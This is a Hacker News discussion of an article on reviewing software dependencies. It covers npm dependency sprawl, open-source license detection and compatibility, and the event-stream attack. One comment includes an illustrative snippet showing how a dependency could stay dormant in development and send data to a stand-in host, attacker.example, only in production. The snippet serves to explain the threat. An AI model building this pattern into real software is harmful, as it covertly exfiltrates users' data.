Always Review Your Dependencies, AGPL Edition (www.agwa.name)
253 points by zdw | 2020-01-06 | 236 comments




That's the hidden cost of npm, cargo, pip, et al. The other one is, IMO, akin to being overweight: try to modernize a mid-sized project after one or two years and cry when you see the dependency graph.

Ceterum censeo go inferior est.


That is exactly why I always ask myself: Do I really need dependency X?

Because that dependency might itself have dependencies, and this quickly grows out of hand with different versions etc. It might work now, but will it in the future? How many different versions of the same package do I really need to depend on?


>Ceterum censeo go inferior est.

AFAICT this means something like "furthermore, I opine that Go[lang] is inadequate".

It's some weird reference to an ancient Roman who always went on about destroying Carthage ("Carthago delenda est").

You, choeger, get the award for "weird reference I bothered to chase up".

Aside, I wonder if PM Johnson (a Classics scholar) had this in mind when his handlers instructed him to mimic Trump's rhetorical technique of "ignore the question just brainwash the suckers into associating you with this 3-word phrase".


I'm not sure if you are being ironic or not, but Cato the Elder is an extremely famous roman figure. I think most educated people, especially on HN, are familiar with his most famous phrase even if it is not in the most common formulation.

Well I've heard of him. But I suspect you greatly overestimate the importance of dead Romans to contemporary programmers.

It is no doubt possible to be a good, English-speaking programmer without knowing much about the Roman Empire and its inhabitants, if you come from East Asia, for instance.

Even for those from the West, there are cultures which do not rate Ancient Rome as so significant that it is necessary for an educated person to be familiar with Cato the Elder's most famous phrase, whatever it may be.


> are familiar with his most famous phrase

In some cases, possibly, via Asterix: https://www.everythingasterix.com/latin-jokes-content/2015/4...


If you define the "modernization" as mindlessly switching to a trending framework or library, the cost is inevitable even without package managers.

You don't need to mindlessly switch to a trending framework or library.

Try upgrading typescript to the latest version. I think that's a fair definition of "modernisation" and something which should be benign.

But now, all of a sudden, you have to upgrade every dependency to the latest version - or write your own .d.ts files - since typings are typically written for one specific library-version/TypeScript-version combination.
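
For reference, a hand-written declaration file is short but tedious to keep in sync; a minimal sketch, with a hypothetical untyped package called `legacy-pad` standing in for the real dependency:

    // legacy-pad.d.ts -- hand-written typings for a hypothetical untyped
    // dependency, so the project keeps compiling on a newer TypeScript
    // without waiting for upstream typings to catch up.
    declare module "legacy-pad" {
      /** Pads `input` on the left with `fill` until it is `length` characters long. */
      export default function leftPad(
        input: string | number,
        length: number,
        fill?: string
      ): string;
    }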


The Rust ecosystem has done a pretty good job at this.

The language and standard library are always backwards compatible (minor security fixes excepted), so updating to a newer language version just works.

Major libraries at the roots of many dependency trees have upgraded in backwards incompatible ways a few times, but the community has pretty consistently come together and helped move every other library that anyone uses to the new version.


I define modernization as anything from updating frameworks and libraries to updating tools and the language itself.

Quidquid latine dictum sit, altum videtur. ("Whatever is said in Latin sounds profound.")

Presumably you need some functionality in the dependencies that you use. If you don't use a package manager then your options are:

* Import the dependency manually. This is taking a dependency without the formal description a package manager gives you, making it harder to audit, update etc.

* Write the functionality yourself. This guarantees you are not exposed to malicious code, but it takes time and your solution will likely have more bugs than a widely used solution. You also lose the ability to use other dependencies that build on top (e.g. React components) because you are now outside the mainstream.

What is actually needed is better tooling to analyze and prune dependency graphs.
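
As a rough illustration of that kind of tooling, here is a minimal sketch that reports how many distinct packages an npm project actually pulls in and which ones are installed in multiple versions. It assumes a package-lock.json in the v2/v3 format (with a top-level `packages` map keyed by install path); the output is illustrative only.

    // count-deps.ts -- sketch: walk package-lock.json (lockfile v2/v3) and
    // report the size of the real dependency graph plus duplicated versions.
    import { readFileSync } from "fs";

    const lock = JSON.parse(readFileSync("package-lock.json", "utf8"));
    const versions = new Map<string, Set<string>>();

    for (const [path, meta] of Object.entries<any>(lock.packages ?? {})) {
      if (path === "") continue; // "" is the root project itself
      const name = path.split("node_modules/").pop()!; // last segment is the package name
      if (!versions.has(name)) versions.set(name, new Set());
      if (meta.version) versions.get(name)!.add(meta.version);
    }

    console.log(`distinct packages installed: ${versions.size}`);
    for (const [name, vs] of versions) {
      if (vs.size > 1) console.log(`duplicated: ${name} -> ${[...vs].join(", ")}`);
    }

Pruning then becomes a question of whether each duplicated or rarely used entry is worth the subtree it drags in.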


> Ceterum censeo go inferior est.

Cur?


Because it did not even bother with a powerful and useful type system. Counterexample: Rust. I don't think Go would be a thing if Rust were, say, two years older than it is.

It's always been weird to me how Microsoft invests so much in making JavaScript easy to develop and maintain with TypeScript but does so little to make it safe. The one thing JS needs is a standard library from Microsoft (or someone similar, e.g. Google) that we can trust, aiming to significantly reduce the number of dubious-origin dependencies of every JS project (on Node and in the browser).

Here's another opportunity to point out this unfortunate licensing bug in TypeScript's standard library:

https://github.com/microsoft/tslib/issues/47

(Disclaimer: I like TS, but I filed the above bug.)


Aside, can anyone explain this to me?

>Please do not use "public domain", it's not a license and it makes it impossible to use such code in corporate context. //

Seems pretty ridiculous, "can't use code unless it's encumbered by licensing restrictions"??



CC0 is a licence. "Public domain" is a state.

Some works have no copyright, typically because they're the product of a US Federal institution, or the copyright has expired. In American English this copyright-free state is also known as "public domain". (In British English it can mean something quite different.)

To put something in the "public domain", you need to make a statement of such. In other words, a licence. You could just say "I put this in the public domain" but it may not provide the certainty that bigcorps like. CC0 is a way of saying this in bigcorp-friendly language. (The CC0 page at https://creativecommons.org/share-your-work/public-domain/cc... explains this well.)

Alternatively, you can use WTFPL, which is a really great way of putting your works in the public domain while guaranteeing that bigcorps won't use them (see: statements on HN by Google people, passim).


>Alternatively, you can use WTFPL, which is a really great way of putting your works in the public domain while guaranteeing that bigcorps won't use them

I thought the point of WTFPL was that you didn't care who used your code for what.


Google will not use anything licensed under WTFPL. Other companies might be the same.

https://opensource.google/docs/thirdparty/licenses/#wtfpl-no...


>To put something in the "public domain", you need to make a statement of such. In other words, a licence. You could just say "I put this in the public domain" but it may not provide the certainty that bigcorps like. CC0 is a way of saying this in bigcorp-friendly language.

It's more than that: it's impossible to place things into the public domain in many jurisdictions - like the UK.

(This is because copyright is property, and property must have an owner under the law of England and Wales [also Scots law I think, but I don't know]. Thus, a declaration that something is in the PD is of no effect.)


You can abandon property to public ownership (land, cars, anything you leave in the street in England & Wales: it gets sold and proceeds go to the Exchequer or Police) so your justification at the end doesn't sway me.

Moreover, Google have been allowed to assume ownership of intellectual property (content of books). The moral rights on those properties have been effectively cancelled.


>You can abandon property to public ownership (land, cars, anything you leave in the street in England & Wales: it gets sold and proceeds go to the Exchequer or Police) so your justification at the end doesn't sway me.

Sure, bona vacantia is A Thing - but your comment spells it out. The copyright gets _sold_ by the state to whoever wants to buy it.

That is not the same thing as public domain - the new owner can enforce their monopoly rights over the works which can screw over anybody depending on the work being "in the public domain".


"Public Domain" is encumbered by Moral Rights https://en.wikipedia.org/wiki/Moral_rights . While they play a very minor role in the US, they exist in Canada and most of the EU. Something like the MIT-license neatly gets rid of them.

Cool, thanks.

I'd argue that when I release something to the public domain that means that I give an open license such that the work can be used as if in the public domain until such time as it actually enters the public domain.

But, yes, I can see how that's a risk companies might avoid until caselaw backs that up.


Yeah, remember the left-pad incident? It took until ECMAScript 2017 to make such a simple function part of the standard library. Things are slowly getting better, but JS is still rather lacking compared to "batteries included" languages like PHP and Python.
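
For reference, the function at the heart of the left-pad incident is now a built-in one-liner (String.prototype.padStart, added in ES2017):

    // What once required the left-pad package is built in since ES2017.
    "5".padStart(3, "0");        // "005"
    "abc".padStart(6);           // "   abc" (default fill is a space)
    String(42).padStart(5, "*"); // "***42"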

This comes up pretty often, what would you like to see in such a standard library? I consider the libraries included in Node pretty extensive these days.

Node is a tiny part, the big fish is JavaScript in the browser

The person I replied to compared the stdlib to that of PHP and Python, both of which are backend components. Frontend land is getting frequent updates already, with a relatively good process, vendor backing and incubation in browsers, not sure what the complaint is supposed to be there? That it's too slow? Imho that's a good thing when it comes to most language changes.

Yeah, it's too slow, but it's not only that: it makes sense for a feature to exist for years in userland as a library (or multiple ones) before being implemented in any standard.

For what it's worth, I don't think that's a bad thing. Assuming you're talking about jQuery and the like, what was adopted into the specifications is the consensus of many years and wouldn't have been predictable in the first few years of that library's history. I mean, frontend land is incredibly fragmented and browsers are not operating systems. Clean APIs and stability, to me, are worth far more than being quick to adopt the latest trend. Otherwise we get competing pet standards again, "made for Firefox / Chrome" buttons, without significant developer adoption. Libraries and shimming aren't inherently bad; single-line libraries on NPM are.

Google has already developed a good featureful JS library. It's called the Closure library. It can be used independently or together with the Closure compiler. It's also more than a decade old, ensuring widespread compatibility, though not necessarily using modern idioms.

Some communities, like ClojureScript, use it extensively, and a front-end project in ClojureScript requires very few dependencies.


I have around a decade of experience doing JavaScript and had never heard of it before; any guesses why it might not be widely known/used?

Edit, answering Jyaif: anecdote is not data, so here it is, comparing the popularity of the Closure library against Angular - another Google technology: https://trends.google.com/trends/explore?date=today%205-y&ge...


FWIW I never wrote JS and yet I've heard of it.

> the one thing JS needs is a standard library by Microsoft

You must be new to this whole Microsoft vs Netscape thing :-)

What Microsoft should do is get Google & co. onboard with creating a full-featured standard library. Microsoft going at it alone would create a huuuuuge backlash because of ye olden days.


Fair enough, yeah it might be better as a collaboration, and if they could include Mozilla and Twitter in the mix that would be even better.

Package managers need to automatically derive properties of end builds based on licenses. E.g., Eclipse Public License 2.0 without the presence of another, more liberal license means the code cannot be used in copyleft software; any dependency that is copyleft is also infectious; etc. Of course it won't account for every single legal property, but the basic checks should be done. To prevent work duplication, a single binary/library written in Go/Rust could take care of this problem and be used across all package managers. It is in the interest of GitHub to sponsor such a project.
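
As a rough sketch of the kind of derivation described above, assuming every dependency's license is already known as an SPDX identifier (the classification table is deliberately simplified and is not legal advice):

    // effective-license.ts -- toy derivation of build-level licensing
    // properties from dependency licenses. The license sets below are
    // intentionally incomplete; a real tool would use a full SPDX matrix.
    type Dep = { name: string; license: string };

    const STRONG_COPYLEFT = new Set(["GPL-2.0-only", "GPL-3.0-only", "AGPL-3.0-only"]);
    const WEAK_COPYLEFT = new Set(["LGPL-2.1-only", "LGPL-3.0-only", "EPL-2.0", "MPL-2.0"]);

    function effectiveProperties(deps: Dep[]) {
      const strong = deps.filter(d => STRONG_COPYLEFT.has(d.license));
      const weak = deps.filter(d => WEAK_COPYLEFT.has(d.license));
      return {
        // One (A)GPL dependency is enough to make the combined work copyleft.
        mustBeCopyleft: strong.length > 0,
        copyleftDeps: strong.map(d => d.name),
        // Weak copyleft mainly constrains changes to those components themselves.
        fileLevelObligations: weak.map(d => d.name),
      };
    }

    console.log(effectiveProperties([
      { name: "left-pad", license: "MIT" },
      { name: "some-parser", license: "AGPL-3.0-only" },
    ]));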

This is one of the services that distros offer, for what it's worth. Every package in Debian is checked for copyright compliance against the DFSG, and annotated with the licenses that are controlling for that code.

The licensing of a dependency could be easily determined programmatically (GitHub already built a decent scanner). However, I think that the quality of a dependency is most important and that requires a manual vetting process. A trivial solution would be to create a crowd-sourced dependency vetting platform.

GitHub's license detection algorithm is crap. It tends to get GPLv2 right, but most other licenses are hit-and-miss. And I still can't find a setting where I can manually specify the license when GitHub can't autodetect one or gets it wrong.

Ruby gems have the license as an explicit field in the gemspec (manifest file). Is this not the case elsewhere?

It makes license scanning a doddle.


> It makes license scanning a doddle.

As someone working in the field of license compliance (leading an Open Source Program Office) and dealing with the licensing of tens of thousands of OSS dependencies on a daily basis for a large company, I can tell you that license scanning / compliance is anything but a doddle. I do a lot of public speaking on this topic; for a summary of the issues, I recommend you have a look at https://static.sched.com/hosted_files/ocs19/c7/OSS-Review-To...

Most modern package managers do offer project maintainers a way to declare the license for a project. However, I can tell you that often the declared license does not match the licenses detected in the source code. What counts is the license stated in the source code files, not what is in the gemspec, package.json, pom.xml etc.

This is a quite common issue, especially for older or larger OSS projects where various contributors have added new code over time that may be licensed under an OSS license that is compatible with, but not the same as, the main license of the project (think adding BSD-2-Clause code to an Apache-2.0 project). What happens is that these contributions get accepted, but the project maintainers do not update the declared license.

I'm not saying that declaring a license in a .gemspec file is useless, but I recommend you take it only as an indicator of the project's main license - the project may include source code that is licensed under a different license.

Lack of clarity around licenses and security vulnerabilities is a big issue within the OSS community, especially as lack of clarity reduces engagement — that means fewer users, fewer contributors and a smaller community. Several organizations are working on an open source solution for these community problems; see https://clearlydefined.io/about for further details.

Full disclosure: I am one of the maintainers of OSS Review Toolkit and a contributor to ClearlyDefined.io.


An even older tradition is a LICENSE file in the root of your project, which GitHub seems to read, but it's not great at matching up the license text to actual licenses.

An alternative tradition uses a COPYING file. I'm not sure which is older, but most GNU projects use COPYING instead of LICENSE. Meanwhile, some projects use COPYRIGHT or other variation, BSD-style licenses are often added directly to source files, and properly applying LGPLv3 to your project involves adding a separate COPYING.LESSER file. It's a mess.

I think most modern package managers have something like that: NPM has a license field in package.json, pypi in pkg-info, nuget in the nuspec file, etc.

Github uses the LICENSE file to detect licenses by default IIRC.


If you trust the license listed in gemspecs alone, you are almost guaranteed to be in violation of a license somewhere. ;)

It can also get things problematically wrong: licenses based on BSD-3-Clause with extra clauses tend to show up as plain BSD-3-Clause.

But people will trust the license tag, and end up breaching the license.


Well, Linux distros are already pretty much that - crowd-sourced dependency vetting platforms. They also take care of the bits actually fitting together, plus quite a bit of QA.

And so very old.

if you want the newest and shiniest there are rolling release distros.

> A trivial solution would be to create a crowd-sourced dependency vetting platform.

And then aren't you just recreating the old fashioned Linux distribution? No-one writes webapps to Linux distros any more; they're always based on language-specific, author-submitted, untrusted package managers because waiting for enough trust to build up to include the latest version of unnecessary-wrapper-for-document.getElementById-0.83.2 is considered stifling.

Maybe nixpkgs comes a little close, somewhat trusted and requiring third-party involvement, multiple versions simultaneously, but including new packages quickly enough. (And indeed, nixpkgs acts as distribution that can run on top of your distro or standalone as NixOS.)


> A trivial solution would be to create a crowd-sourced dependency vetting platform.

Such a platform is already being developed by various organizations (see https://clearlydefined.io/about) and is already in use by GitHub. It's still under development, and the initial focus is sharing data regarding copyrights, licenses and source code locations for OSS packages.

Note that ClearlyDefined only scans the code repository of an OSS project; it does not resolve dependencies for scanned OSS projects. This makes sense, as not all dependencies of OSS project B are inherited by a project A which includes B as a dependency (due to dependency version resolution by the package manager, or dependencies only used for testing).

The idea is that you use a tool to resolve dependencies for the package manager your project uses, which then queries the ClearlyDefined APIs.

We are building such a tool, an open source project to manage licensing and security for dependencies, named OSS Review Toolkit (https://github.com/heremaps/oss-review-toolkit).

For an overview of the solution we are building, see slide 9 in https://static.sched.com/hosted_files/ocs19/c7/OSS-Review-To...

Full disclosure: I am one of the maintainers of OSS Review Toolkit and also a contributor to ClearlyDefined.


There is https://www.fossology.org/ which helps a bit.

There are a lot of tools in this space:

https://wiki.debian.org/CopyrightReviewTools


If you want to do license compliance for various package managers then I recommend you checkout https://github.com/heremaps/oss-review-toolkit.

Full disclosure: I am one of the maintainers of OSS Review Toolkit.


This is a reason for Debian to exist.

Licenses cannot be reviewed automatically in a reliable way. Debian developers review the licenses and store them in a machine-parsable file.


Are you saying that standard licenses cannot be checked for compatibility automatically? Or that arbitrary homebrew licenses cannot be checked automatically?

Didn't Debian push a stable security update for Ghostscript that changed the license over to AGPL some time ago?

Did they break the license meta data while doing so?

Agreed. I found this project helpful for automating dependency checks: https://github.com/pivotal/LicenseFinder

I actually played around with turning it into a GitHub action for further usability improvement, although it needs more work: https://github.com/ralexander-phi/license_approval


Pivotal Labs' license finder used to be my go-to recommendation (and still is if "free" is an absolute requirement), but if a company takes license management seriously, I'd recommend checking out FOSSA[0] instead. It's significantly better and fairly reasonably priced.

[0] https://fossa.com/


I think each respective package manager should just support this out of the box.

I think you would end up in a rabbit hole. Do you also review all your GNU/Linux libraries and dependencies? Probably not, because you trust them. Thus I think we should be pragmatic and review only libraries which are created by unknown/untrusted creators.

Well I think you should at least do two things:

- avoid dependencies where you reasonably can. Fewer moving parts are usually good

- just have a look at the dependencies of your dependencies - this might help you decide which one to trust


Open-source projects can and do change maintainers. Adding a dependency means you not only trust the maintainer now, but you also trust all future maintainers of the project.

Dependencies are more dangerous (in this sense) because they compile into your application, so they can do anything they like to your customer data. A malicious tool could monitor your keystrokes and phone home, but it won't get installed on your production server.

A further problem with npm dependencies is that they get told when they're operating in dev mode and when in production mode. So malicious code can hide itself during dev and test, and then only do the bad thing on the production server.
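
Purely as an illustration of that last point (the helper name, endpoint and trigger are all made up), the pattern is as simple as:

    // Illustration only: how a malicious transitive dependency could stay
    // quiet in development and CI and misbehave only in production.
    // Assumes Node 18+ for the global fetch; the endpoint is fictional.
    export function innocentLookingHelper(data: string): string {
      if (process.env.NODE_ENV === "production") {
        // Never runs under `npm test` or local development.
        void fetch("https://attacker.example/collect", {
          method: "POST",
          body: data,
        }).catch(() => { /* fail silently */ });
      }
      return data.trim(); // the advertised, legitimate behaviour
    }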


Debian packages are maintained (and quickly vetted) by a rather small group of people (who vet each other). npm packages can be published by anyone without review.

On a somewhat related topic: https://drewdevault.com/2019/12/09/Developers-shouldnt-distr...


I would love to have this guy write my security sensitive software.

I used to work with a guy who would review every line of our projects' node modules. He'd find issues all the time, so there's no way he wasn't paying attention. He also managed to be productive writing his own features. Having that guy on the team was amazing; I have no idea what motivated him to do such tedious work, but he seemed to love it...

With a bit of electronics background this feels like the difference between a hobbyist and a professional.

Most programmers feel like hobbyists to me, in their YOLO approach. Your software might ruin someone's day, their life, or maybe even end up killing people, and more people should take that seriously. The way your colleague worked should be the norm.


I'd think the comparison goes the other way around :). Hobbyists care enough to do things right even if it's not in the short-term interest. Professionals, judging by all the advice I read on-line, are supposed to focus on delivering value - which is usually measured short-term, and not aligned with doing things right. It's that attitude that makes most companies care little to none about security. Bringing in tons of dependencies in order to increase velocity and implement user-facing features faster is what I see advertised as archetype of a professional in this industry.

> I'd think the comparison goes the other way around :)

Only in the Software industry. This is however not normal:

* Mechanical Engineering: Hobbyist bridge vs. professional Bridge – which one should you be able to trust more to carry you?

* Electrical Engineering: Hobbyist wall wart vs. professional wall wart – which one should you be able to trust more not to burn your house down?

* Medical Treatment: Hobbyist vs. professional – which one do you trust more with your body?

The list goes on. Professional work isn't about cobbling together something that barely works at the edge of complexity you can just about manage. Professional work is building something reliable and robust that you can guarantee, at least to a certain degree.

I know that this isn't how Software Development works right now in most places – that was the whole point of my comment. However it is not normal. It is a bit like with early cars: back then a hobbyist could have easily made a safer car than any professional manufacturer with the right amount of commitment, because there were no real safety standards. Try doing that nowadays.

Edit: Good related talk by the legend himself (Ross Anderson): https://media.ccc.de/v/36c3-10924-the_sustainability_of_safe...


IMHO, lots of software development resembles crafting much more than engineering and we have put so much effort into sounding smart that we are now training craftsmen that sound like scientists but are not necessarily good at their craft...

"I used the Singleton Pattern!" "Awesome, you learned about global variables!" blank stare


"All patterns are anti-patterns."

Or a factory method returning a singleton as a null object

Agree on mechanical and medical, but:

> Hobbyist wall wart vs. professional wall wart – which one should you be able to trust more not to burn your house down?

I will trust a well-known brand with lots at stake, like Apple. But on the other end of the spectrum, I would put more trust in a charger built from the ground up by a hobbyist from my local hackerspace than I would in a random charger off Amazon or AliExpress (and in fact, I have had two no-name multi-port USB chargers from China fry themselves).

In general, I'll trust a hobbyist that cares about their craft more than someone doing it for money, unless the latter has their own skin in the game (e.g. doing a bad job would cost them real money, I can sue them, the government could put them in jail).

So with civil engineering, medical care and car manufacturing, I will trust the professionals - because there are strong legal incentives stopping them from cutting all possible corners or doing lots of nefarious things (that doesn't stop these industries from trying, though). But software is a completely different story. There's no protection, no incentives to counterbalance the sociopathy that arises when one optimizes profits too strongly. If you look at modern software, it all looks so great at the point of sale. The bad things - vendor lock-in, excessive telemetry, bad security, selling people out to advertisers, leaking the data due to bad security - all those things hurt users post-sale, and companies know that none of this meaningfully affects their profits in any way.

And even looking at the "normal" industries - at their culture - I have the impression that it's not the "for money" part that's responsible for quality, but the counterbalancing incentives; I think all these industries would be just as bad as software if it weren't for the regulation that retards the profit optimization.


I think GP's choice of examples for electrical engineering likely wasn't a good one, but their point generally stands for the time being. Sadly, I see electrical engineering as an industry degrading in quality in a similar fashion to how the software industry has.

The risk profiles of the examples you gave are not comparable to that of most software projects. Most software projects are harmless if they crash. No one is hurt.

Software projects which do risk injury and death, for example embedded medical devices, get a lot more engineering and QA.


While you are certainly right that certain fields are more deadly than others, less direct things like losing someone's personal pictures, leaking someone's unencrypted medical data, getting some abstract score wrong, etc. can seriously impact your users' lives. And even the more security-critical fields constantly get things wrong. When you can remotely change the workings of an insulin pump that is in someone else's body, and it turns out neither the programmer nor the regulators thought authentication might be a good idea, you know something is very wrong with a whole profession.

The latest Boeing example is more of a regulatory failure, but somewhere someone sat and coded the behaviour that killed several hundred people.

We as programmers are just as responsible for what our stuff is doing as anybody else. Maybe even more so, because the work of our hands multiplies. If we put in the effort to make something a little easier, safer and faster that people use every day, we impact more lives than we might know. And the same is true for the other direction.

Why is it that software glitches are always seen as a god-given higher force that nobody could have prevented? I know managing complexity is hard, but there is proof out there that it can be done if wanted. We could wait till we are forced to do it by law, or (preferably) develop at least a pinch of ethos for our own work.


I wouldn't bet on the industry reforming itself. If all other industries are an indication, quality and safety needs to be regulated in.

The Boeing case is indeed a good example. They cared about the safety of their planes up until they figured out how to make more money by skillfully avoiding having to care. It looks like it blew up in their faces, but I'm not so sure of that - they're more than "too big to fail", they're a strategic company for the US, so the military won't let them fail.

> If we put in the effort to make something a little easier, safer and faster that people use every day, we impact more lives than we might know.

My point (here and in the parallel reply) is: if "being a professional" is defined as being focused on business objectives and bringing in revenue through your work, then putting in that effort - making things easier, safer and faster - is, by that definition, unprofessional behavior: sacrificing time and revenue for goals the market doesn't care about.


You can use some code he's written -- git-crypt[0] is fantastic at managing secrets :)

[0]: https://www.agwa.name/projects/git-crypt/


> I repeat the above recursively on transitive dependencies as many times as necessary. I also repeat the cursory code review any time I upgrade a dependency.

If this guy has to work on a "modern" frontend project, he's gonna review dependencies until the heat death of the universe.


But doesn't that say more about modern leftpaddable frontend frameworks than about the author?

It sure does. ‘Don’t repeat yourself’ and ‘avoid NIH syndrome’ are noble goals but ‘automatically update myriad libraries from random sources on the internet and then run them’ gives me the heebie jeebies.

Okay, but let's be clear about why we're putting "modern" in quotes. Sure, pulling in half of NPM is a common way to do things currently, but it's also a very painful way to do things, currently. A "modern" dependency tree is going to cause you tons of pain, starting with having to configure your dependency tree and getting worse from there. If you use a few, small, effective dependencies, you can reasonably do a cursory code review with every upgrade, and there are other major benefits.

Don't let some drive to be "modern" cause you to use libraries that make things more difficult than using vanilla JS.


What this guy does sounds like a machine-doable job.

At our company we use WhiteSource to scan each and every build for these kinds of license violations.


Nearly spat out my cereal, thanks. Funny because accurate. As a relatively new node dev, this is what keeps me awake at night.

And his comment is copy-paste from Reddit: https://old.reddit.com/r/programming/comments/ekjacu/this_is...

Slightly ridiculous that we're getting to this point :-)


A reason why I appreciate Angular: then I know (or so I think?) someone else is vetting the base dependencies.

When this webpage loads, it briefly flashes in plaintext before loading CSS - at least in Chrome. This is unusual since it has the CSS stylesheet in the head which I thought would block until it's fully loaded. Does anyone know what's going on with that?

This is what happens when you dynamically insert your CSS tag in the head after the DOM loads.

If you view the raw data coming from the web server, the link tag containing the stylesheet is already present in the head. Although what you're saying sounds like it can absolutely cause this type of behaviour, I'm not sure if that's what's happening in this case.

You are correct. I suppose it could be an unreviewed NPM dependency causing this ;)

I guess render-blocking isn't really a thing, the HTML spec only describes script-blocking and is light on the rendering aspects. Now most web pages have styles and scripts and since styles block scripts, you usually perceive styles as render-blocking. But this web page doesn't have any scripts, so the browser reaches DOMContentLoaded right after parsing the HTML and does the first paint while the request for the style is still in flight.

At least that's my theory. You could test this by inserting an empty <script> tag into the <body>, which should delay DOMContentLoaded until the style arrives and prevent the flash of unstyled content.


Only <script> blocks by default, <link rel="stylesheet"> doesn't.

This is the classic FOUC that has been around for like 20+ years: https://en.wikipedia.org/wiki/Flash_of_unstyled_content

This is one of the items that embedded Linux development using Yocto has particularly well covered. It checks every license for every package, and you can ask it to verify the checksum of the license file. If the license changes after upgrading a package, you'll get a build error.

Not sure about this bit:

> This is quite a bit of work, but is necessary to avoid falling victim to attacks like _event-stream_.

Reviewing dependencies is important, but I don't think anything the author mentions would have made a difference with event-stream. The whole issue there was that malicious changes were snuck in via a change of maintainers and a later update to a child dependency, so when people initially adopted it as a dependency there were no red flags in the library to find.


He talks about reviewing dependencies when they are updated, as well, which certainly would help if someone snuck in malicious code in a minor version change.

Well, he talks about reviewing when he upgrades a dependency, but the tricksy thing about event-stream was that people could get the malicious change without having intended to upgrade anything.

The only thing that really prevents such issues is version locking of transitive dependencies (which the author doesn't mention, but it could be that his package manager does it by default, or similar..).


I had missed that npm doesn't (didn't?) lock package versions by default. That's really scary.

It does today, and I could be crazy but I think it did even before event-stream. But of course some users will have been on old versions of npm, or not checking in their lockfiles, etc.

I should add, I was probably wrong to talk about lockfiles preventing such issues. With event-stream the malicious code was hidden deviously enough to evade a pretty rigorous check - if a Node update hadn't deprecated one of the functions used in the payload, I suppose we might still not know about it. In such cases a lockfile is at least a layer of defense, but naturally it only helps if you're lucky enough to have installed the library before it got corrupted..


It seems like this is a good opportunity for Github to warn you if

a) a PR would merge a new dependency with an incompatible license to yours

and

b) allow you to filter out projects based on licenses from search results. in general most of us would prefer to avoid being tainted by GPL code and it'd be great to hide it on the site entirely.


Why don't npm-like package managers have settings for licenses in applications (as opposed to libraries)? Settings like "no AGPL" or "no copyleft dependencies" would allow easy vendoring with modifications. This (disabled by default) feature might break some proprietary code, but if it does, that indicates you were not following copyright law prior.

Obviously this doesn't solve the general quality problem with dependencies that the author notes, but it fixes some licensing issues.
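
In the absence of such a setting, a CI step can approximate it today by reading each installed package's declared license; a minimal sketch (the denylist is an example policy, and declared licenses are only an indicator, as noted elsewhere in the thread):

    // deny-license.ts -- sketch: fail the build if any installed dependency
    // declares a license on the denylist. Scoped packages live one directory
    // deeper; this naive version simply skips directories without a package.json.
    import { readdirSync, readFileSync, existsSync } from "fs";
    import { join } from "path";

    const DENY = ["AGPL-3.0", "AGPL-3.0-only", "AGPL-3.0-or-later"]; // example policy

    let violations = 0;
    for (const name of readdirSync("node_modules")) {
      const pkgJson = join("node_modules", name, "package.json");
      if (!existsSync(pkgJson)) continue;
      const { license } = JSON.parse(readFileSync(pkgJson, "utf8"));
      if (typeof license === "string" && DENY.includes(license)) {
        console.error(`forbidden license ${license} in ${name}`);
        violations++;
      }
    }
    process.exit(violations > 0 ? 1 : 0);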


Node's popular `pm2` itself is AGPL. I don't think they're too fussed about copyleft.

> I don't think they're too fussed about copyleft.

Yeah, and I'm not either. I have never decided to vendor dependencies, and my only modifications to GPL code were to upstream (so I didn't have a legal obligation to distribute the modified code - the distributors of the code I modified do). I just think automated license compatibility checking could be a good move for the ecosystem.

Also to be clear, I was talking about npm-like ecosystems. In my mind this includes npm, poetry and cargo (and probably more).


I hope that in your comment you are not mixing up LGPL and GPL.

Node has tons of AGPL packages which seem to be used by quite a lot of things.

I myself saw a pm2 error message in Linkedin's error 500 output


GPL or AGPL software should not exist on NPM for libraries. For tools, yes, but GPL for libraries is a non-starter for 99% of the users. It just does not belong in a library ecosystem.

To be clear: everyone has the right to license their stuff however they like. I just think NPM as an ecosystem should be opinionated (and it is... towards MIT. Just not completely).


There are over 200 OSI-certified open source licenses, and no automatable way to handle them.

I (and I'm sure many others) would gladly take an option to provide a whitelist of acceptable licenses.

I count 97 (https://opensource.org/licenses/alphabetical), but point taken.

Maybe there should be an organized effort to make some sort of compatibility matrix for all the OSI licenses...


Gentoo's package management system has neat automatable way to handle package licenses. See https://www.gentoo.org/glep/glep-0023.html

Yarn has `yarn licenses list`[1], which is very useful. And there is an accepted RFC for `yarn licenses check`[2] that would check against a list of allowed licenses.

[1] https://yarnpkg.com/lang/en/docs/cli/licenses/

[2] https://github.com/yarnpkg/rfcs/blob/master/accepted/0000-li...


I try to convince my team that the Node.js ecosystem has gotten to a stage where it cannot be used for security/financial applications, because the sheer number of dependencies poses an inherent threat. I advocate for Go because of its tendency towards fewer and more easily reviewable dependencies. Nobody except me seems to see a problem there, despite my being able to point out specific security incidents.

I am wondering if I am missing something obvious here and would value any opinion.


TJ Holowaychuk said goodbye to Node in 2014 and switched to Go, so you're not the first.

https://medium.com/code-adventures/farewell-node-js-4ba9e7f3...


There's also Java and .NET for those who want better IDE support, better dependency management (without recursively downloading hundreds of packages), and a more traditional and more fully featured language.

PS: I came to statically typed languages as an adult, I actually disliked those languages before I had the lightbulb moment, so I think I might even be more qualified than everyone who hasn't managed to enjoy both sides ;-)


Whilst the dependency management story for Node and Python is sub-par, it's not all roses in Java land either, with Maven and POM-file XML hell.

Use Gradle

Actually, again as someone who has some real life experience with a number of different systems, including

- pip for Python,

- NPM,

- Nuget

- and Maven (and Ant)

Maven is by far my favorite, despite XML.

In fact, given how small pom files are and how little you have to deal with them (if you know what you are doing), I find it amazing how many comments I have had to read about "XML hell" etc.


This holds up if you actually do review all Go dependencies.

Times are changing, so all the power to you if you actually review it. Otherwise the advantage will remain a potential, never to be realised.


similarly, I refuse to use JS libs that have ridiculous dependency trees (most annoyingly, including Webpack, which means my Vue setup is more interesting than it needs to be).

I was explaining why to a friend, and it appears that no-one takes this threat seriously, not even in secure/financial apps.

Like you, I wonder if I'm missing something obvious. Why does the npm dependency trust nightmare give me the screaming heeby-jeebies but everyone else thinks it's all perfectly fine?


It's not just you. Screaming heebie-jeebies is exactly the correct response.

People who don't worry about it tell themselves that nothing that matters very much is coded in javascript, obvious exceptions notwithstanding.

Maybe the only practical way left to avoid it is to avoid javascript for things that matter, and to avoid products constructed with javascript for uses that matter. This might be an unpopular observation, but that does not make it wrong.

It is possible that WASM can fix much of this, at the cost of exposing ourselves to what might be extreme risks inherent in WASM itself. And of course, to whatever dependencies are brought in for the language we compile to WASM.


Indeed, Rust is a likely WASM choice, and it is working on an npm nightmare of its own with crates.io. A blessed crates pack is sorely needed to fill out the intentionally thin stdlib in cases where you can't afford a dependency tree 20 layers deep, for all the reasons mentioned in this thread.

